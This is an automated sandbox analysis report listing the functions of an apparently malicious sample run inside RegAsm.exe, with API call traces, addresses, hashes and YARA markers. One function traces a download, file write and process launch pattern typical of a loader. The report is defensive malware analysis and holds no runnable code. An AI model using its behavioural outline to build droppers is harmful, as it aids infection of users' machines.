Instruction Fuzzy Hash: 772148357043049FCB14DF18D889A9EFBE5EF89314F00882CE99A87361CB30A909DB92

Function 6C09B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C09B4F5
AcquireSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C09B502
ReleaseSRWLockExclusive.KERNEL32(6C10F4B8), ref: 6C09B542
free.MOZGLUE(?), ref: 6C09B578

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 3a8b2990be1df9b9ce427ab38181e2f9c4fa0aa902339539b2369e7aa3ea351a
Instruction ID: 2ddb9c747ae0e606a8c7f964af43ab9ffef4006b3091446ab80c5de234311843
Opcode Fuzzy Hash: 3a8b2990be1df9b9ce427ab38181e2f9c4fa0aa902339539b2369e7aa3ea351a
Instruction Fuzzy Hash: 3F11DF30A04B45C7D3218F69C404765B3F5FF96328F50A70EE84993A02EFB0B1C5A794

Function 6C0C3DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C08F20E,?), ref: 6C0C3DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C08F20E,00000000,?), ref: 6C0C3DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C0C3E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C0C3E0E

Part of subcall function 6C0BCC00: GetCurrentProcess.KERNEL32(?,?,6C0831A7), ref: 6C0BCC0D
Part of subcall function 6C0BCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C0831A7), ref: 6C0BCC16

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 6a406b9654cef81532adf079f39fc920599855712c373aa8141c97db47d79e35
Instruction ID: 33be538280a960366757058e8877ec2b6e9c43472b20fc780d3dbf6ff09ab850
Opcode Fuzzy Hash: 6a406b9654cef81532adf079f39fc920599855712c373aa8141c97db47d79e35
Instruction Fuzzy Hash: 3BF012716002087BD700AB54DC42EEB376DEB46628F040025FE1957741DB36BD6996F7

Function 00410CC0 Relevance: 6.0, APIs: 4, Instructions: 39memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
HeapAlloc.KERNEL32(00000000), ref: 00410CDF
GetLocalTime.KERNEL32(?), ref: 00410CEB
wsprintfA.USER32 ref: 00410D16

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: c7062ee0803dc682f4bd22a1f6830d1074b171fc43ac1dbb61c851727eb39e82
Instruction ID: 3361d4878da1eea6239f97e2bf75980f5f1ac49a34b78f17876420eca4585326
Opcode Fuzzy Hash: c7062ee0803dc682f4bd22a1f6830d1074b171fc43ac1dbb61c851727eb39e82
Instruction Fuzzy Hash: 4DF031B1900218BBDF14DFE59C059BF77BDAB0C616F001095F941E2180E6399A80D775

Function 00412166 Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
GetFileSizeEx.KERNEL32(00000000,00414FAC,?,?,?,00414FAC,?), ref: 00412199
CloseHandle.KERNEL32(00000000,?,?,?,00414FAC,?), ref: 004121A4
CloseHandle.KERNEL32(00000000,?,?,?,00414FAC,?), ref: 004121AC

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 7686551e53b7644eb34baed25e55cd4cc7a7d590d99c042858ac62be5e4dc265
Instruction ID: 87089636491fbed30b1748ff62e0772d8b8c37abbef2c6f1f22f5f972430845f
Opcode Fuzzy Hash: 7686551e53b7644eb34baed25e55cd4cc7a7d590d99c042858ac62be5e4dc265
Instruction Fuzzy Hash: 29F0A731641314FBFB14D7A0DD09FDA7AADEB08761F200250FE01E61D0D7B06F818669

Function 6C0D2050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0D205B
AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C0D201B,?,?,?,?,?,?,?,6C0D1F8F,?,?), ref: 6C0D2064
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0D208E
free.MOZGLUE(?,?,?,00000000,?,6C0D201B,?,?,?,?,?,?,?,6C0D1F8F,?,?), ref: 6C0D20A3

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 3bb72a4c356b36cc6aecf75a31a010da4bc3b9df126228a85e1b09b632f75e90
Instruction ID: 65a0b6a1edee35f10fbb94681b1e8a9c9f8f1db0017366268d6e35a552815b80
Opcode Fuzzy Hash: 3bb72a4c356b36cc6aecf75a31a010da4bc3b9df126228a85e1b09b632f75e90
Instruction Fuzzy Hash: D2F0B475200B009BC7119F16D88875BBBF8EF86324F15011EE50687711CB75B806CB95

Function 6C0D20B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0D20B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6C0BFBD1), ref: 6C0D20C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C0BFBD1), ref: 6C0D20DA
free.MOZGLUE(00000000,?,6C0BFBD1), ref: 6C0D20F1

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 583f365011d2e44c50aca28c8d489f705fecedc3d94eeec3fc61318639a83a2d
Instruction ID: 0a47e9431fa60604f61f2cb2db3cb191c60ab621650ac9256798f368bb44693d
Opcode Fuzzy Hash: 583f365011d2e44c50aca28c8d489f705fecedc3d94eeec3fc61318639a83a2d
Instruction Fuzzy Hash: AEE0E5357007158BC2209F25980864EBBF9FF86318B12062AE40683B01DB75B94687D5

Function 6C0D85B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C0D85D3

Part of subcall function 6C09CA10: malloc.MOZGLUE(?), ref: 6C09CA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C0D8725

Strings

map/set<T> too long, xrefs: 6C0D8720

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 451e7a98ad0771198ec435e9085e2c65bbc376a3c75777af3a30d3dd164c0df6
Instruction ID: 5146e35d6a2ff9e88c6cd503ef81fc060e8ff8fe367a18d6c1d2cd534acba80b
Opcode Fuzzy Hash: 451e7a98ad0771198ec435e9085e2c65bbc376a3c75777af3a30d3dd164c0df6
Instruction Fuzzy Hash: F65133746046418FD701CF18C184B5ABBE1BF4A328F1AC29AE8595BB52C375F885CFD2

Function 00412BF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00405237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
Part of subcall function 00405237: RtlAllocateHeap.NTDLL(00000000), ref: 00405285
Part of subcall function 00405237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
Part of subcall function 00405237: StrCmpCA.SHLWAPI(?), ref: 004052C1
Part of subcall function 00405237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
Part of subcall function 00405237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
Part of subcall function 00405237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
Part of subcall function 00405237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460

_memset.LIBCMT ref: 00412CDF
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00436710), ref: 00412D31

Strings

.exe, xrefs: 00412C3C

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
String ID: .exe
API String ID: 2831197775-4119554291
Opcode ID: dca4419b34fce0c28ab30abb3e60bf27d84a7dc54cda20d1bfd4b76e486b6db5
Instruction ID: b22801d522c47b455a3bf9a13fec4127fa4a3e5ad37381d5e28ead6c554ce160
Opcode Fuzzy Hash: dca4419b34fce0c28ab30abb3e60bf27d84a7dc54cda20d1bfd4b76e486b6db5
Instruction Fuzzy Hash: 87418472E00109BBDF11FBA6ED42ACE7375AF44308F110076F500B7191D6B86E8A8BD9

Function 6C08BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C08BDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C08BE8F

Strings

0, xrefs: 6C08BE5B

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 09985f3730971e1f0f7220518dba48c7fe38f00a1d83bce7e1e611f18ecdd962
Instruction ID: 34ba1a9be3d5d3020906e2195adc735306d2b879b56e04b79d3a227efb2587c9
Opcode Fuzzy Hash: 09985f3730971e1f0f7220518dba48c7fe38f00a1d83bce7e1e611f18ecdd962
Instruction Fuzzy Hash: B841A27150A745DFCB41CF28C881A5FBBE4AF8A348F008A1DF98567611E731E5498B92

Function 6C089A20 Relevance: 5.3, APIs: 4, Instructions: 338COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C089B2C
memcpy.VCRUNTIME140(6C0899CF,00000000,?), ref: 6C089BB6
memcpy.VCRUNTIME140(?,?,?), ref: 6C089BF8
memcpy.VCRUNTIME140(?,?,?), ref: 6C089DE4

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: e4b2e756c11fb2dd63461e06fc6b6f6a439e799f84a0f10c5b33812f20c35061
Instruction ID: 5e8fab95ecbee9cbdbc90118f9871384593f2ced79890c5cd57aaca106c8199c
Opcode Fuzzy Hash: e4b2e756c11fb2dd63461e06fc6b6f6a439e799f84a0f10c5b33812f20c35061
Instruction Fuzzy Hash: BED16A71A0120A9FCF14CFA9C981BAEBBF2FF88314F188529E915A7740D771E955CB90

Function 6C0D0A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 6C0937F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6C0E145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6C09380A

Part of subcall function 6C0C8DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6C0E06E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6C0C8DCC

Part of subcall function 6C0D0B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6C0D138F,?,?,?), ref: 6C0D0B80

?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6C0D138F,?,?,?), ref: 6C0D0B27
free.MOZGLUE(?,?,?,?,?,6C0D138F,?,?,?), ref: 6C0D0B3F

Strings

baseprofiler::profiler_capture_backtrace, xrefs: 6C0D0AB5

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
String ID: baseprofiler::profiler_capture_backtrace
API String ID: 3592261714-147032715
Opcode ID: 9e2404c748509df357a37adba8895653c7f54bf54279c941d57ec91593adf5f8
Instruction ID: 310aef743ef6b6dcae6fbe73aad410bebad1527661f2c773c1740fc89439d893
Opcode Fuzzy Hash: 9e2404c748509df357a37adba8895653c7f54bf54279c941d57ec91593adf5f8
Instruction Fuzzy Hash: F0218874B083459BEB04DF58C891BBEB3F9AF8560CF11042DE819ABB41DB71B905CBA1

Function 6C08F180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(?,?), ref: 6C08F19B

Part of subcall function 6C0AD850: EnterCriticalSection.KERNEL32(?), ref: 6C0AD904
Part of subcall function 6C0AD850: LeaveCriticalSection.KERNEL32(?), ref: 6C0AD971
Part of subcall function 6C0AD850: memset.VCRUNTIME140(?,00000000,?), ref: 6C0AD97B

mozalloc_abort.MOZGLUE(?), ref: 6C08F209

Strings

d, xrefs: 6C08F1F5

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c080000_RegAsm.jbxd

Similarity

API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
String ID: d
API String ID: 3775194440-2564639436
Opcode ID: 08ae85f7240e55ab36077c46e911ef88052fd77cfd4de61033d8c9fbaa32a302
Instruction ID: 6d611e67ee2d01568c1f19aafa199d8d8f9b7a2c04ad1675848ff06d7d3cc283
Opcode Fuzzy Hash: 08ae85f7240e55ab36077c46e911ef88052fd77cfd4de61033d8c9fbaa32a302
Instruction Fuzzy Hash: 37113A32B0674987EF048F6899512EEB7F9DF96208B11911DDD45AB612EF30EAC4C380

Function 0040F093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F0D6
_memmove.LIBCMT ref: 0040F104

Strings

string too long, xrefs: 0040F0D1

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 8a227626b72f4056b64c0a26e4177402fb02d15917d8bca6e61607cae78b5d0a
Instruction ID: 7a0806fae085cf6787416122fb97cfb1012f07200118ac727d966ddb9d8bf46f
Opcode Fuzzy Hash: 8a227626b72f4056b64c0a26e4177402fb02d15917d8bca6e61607cae78b5d0a
Instruction Fuzzy Hash: D211E371300201AFDB24DE2DD840929B369FF85354714013FF801ABBC2C779EC59C2AA

Function 00411ECF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00411EF9

Strings

image/jpeg, xrefs: 00411F21

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: malloc
String ID: image/jpeg
API String ID: 2803490479-3785015651
Opcode ID: 6b72b0d373d1163626baf5e7838df7277c332a4d567d67e2b356543416a513d9
Instruction ID: 1c9963d8e1bd3712552ddde0994ffc3eb950a7432bc1cc1e62e4a2615aecff81
Opcode Fuzzy Hash: 6b72b0d373d1163626baf5e7838df7277c332a4d567d67e2b356543416a513d9
Instruction Fuzzy Hash: 5A11A572910108FFCB10CFA5CD848DEBB7AFE05361B21026BEA11A21A0D7769E81DA54

Function 6C09CA10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?), ref: 6C09CA26

Part of subcall function 6C09CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C09CB49
Part of subcall function 6C09CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C09CBB6

mozalloc_abort.MOZGLUE(?), ref: 6C09CAA2

Strings

d, xrefs: 6C09CA6C

Memory Dump Source

Source File: 00000004.00000002.2816830820.000000006C081000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C080000, based on PE: true

Associated: 00000004.00000002.2816780494.000000006C080000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817367710.000000006C0FD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817454041.000000006C10E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2817503452.000000006C112000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

